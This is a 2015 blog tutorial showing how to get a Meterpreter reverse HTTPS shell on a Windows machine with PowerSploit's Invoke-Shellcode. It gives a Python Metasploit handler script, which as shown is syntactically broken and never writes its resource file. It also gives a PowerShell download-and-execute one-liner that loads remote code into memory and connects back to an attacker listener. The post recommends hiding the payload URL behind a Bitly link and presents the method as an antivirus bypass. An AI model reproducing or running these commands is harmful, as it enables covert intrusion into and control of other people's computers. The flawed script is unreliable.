Wednesday, 11 November 2015

PowerSploit : Quick Shell for Penetration Testing

While penetration testing , sometimes all we want is a shell and no meterpreter or other RAT functionalities . This can be due to plenty of reasons : only shell access is less noisy , more chances of evading the Anti virus engines , less chances of inappropriate exploitation during pentest and so many more .

This Tutorial will get you the quick shell access you need during the penetration testing in the easiest way . For this we will be using Powersploit . 

PowerSploit mainly uses Powershell for Windows Exploitation .

PowerSploit  is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in Kali, and its code is utilized by other awesome tools like SET  so you may already be using it . PowerSploit however is also available for download at GITHUB .

Many of the scripts in the project are extremely useful in post-exploitation in Windows environments.

In this tutorial we will utilize the PowerSploit feature : InvokeShell

In order for this to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box.

One can use the below Python script to setup the initial steps :

#!/usr/bin/env python
# Simple python script to start a Meterpreter HTTPs Handler
# by Chris Campbell (obscuresec)
import sys
import subprocess

#write a resource file and call it
def build(lhost,lport):
 options = "use multi/handler\n"
 options += "set payload windows/meterpreter/reverse_https\nset LHOST {0}\nset LPORT {1}\n".format(lhost,lport)
 options += "set ExitOnSession false\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j\n"
 filewrite = file("listener.rc", "w")
 subprocess.Popen("/opt/metasploit/app/msfconsole -r listener.rc", shell=True).wait()

#grab args
 lhost = sys.argv[1]
 lport = sys.argv[2]

#index error
except IndexError:
 print "python lhost lport"

To start the multi/handler and configure it, we just run the script:

python <listner-ip> <listner-port>

Now that our handler is ready, we can move on to executing our shell.

Use Bitly to create a URI that is short and disguised .

Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the function and pass it to Invoke-Expression to put it into memory:

IEX (New-Object Net.WebClient).DownloadString(‘’) [where is the disguised URI]

Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:

Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost <listner-ip> –Lport <listner-port> –Force

We can actually combine these commands to run a single command to execute our shell:

IEX (New-Object Net.WebClient).DownloadString(‘’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost <listner-ip> –Lport <listner-port> –Force

Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:

That is the easiest and most convenient AV-bypass yet I have came across .

Just open PowerShell and type a command.

Hopefully this one way PowerSploit can make your life as a pen-tester easier.

No comments:

Post a Comment